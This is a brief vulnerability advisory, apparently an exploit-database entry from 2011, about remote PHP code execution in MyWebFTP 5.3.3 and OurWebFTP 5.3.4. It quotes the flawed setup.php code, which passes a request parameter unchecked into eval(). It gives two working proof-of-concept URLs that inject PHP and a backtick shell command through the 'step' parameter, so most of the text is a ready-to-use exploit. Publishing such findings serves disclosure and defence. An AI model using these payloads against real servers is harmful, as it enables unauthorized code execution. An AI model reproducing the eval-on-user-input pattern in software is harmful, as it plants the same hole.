MyWebFTP 5.3.3 & OurWebFTP 5.3.4 Remote PHP Code Execution Vulnerability by condis 04.10.2011 download: Source of setup.php: 30. start_html(); 31. if( checkReady() ){ [1] 32. init(); 33. listSetupOptions(); 34. if ( isset($_REQUEST['step']) ){ 35. $step = $_REQUEST['step']; 36. eval("step_$step();"); [!] 37. } To exploit this issue, everything must be configured propely so that installation can be done without any errors [1]. To meet these conditions all you have to do is make sure that there is directory with name defined in LD_DIR const with permission to write into it, and that the administrator haven't deleted setup.php Proof of Concept: http://host.tld/myftpdir/setup.php?step=;phpinfo();// http://host.tld/myftpdir/setup.php?step=;print_r(`uname -a`);//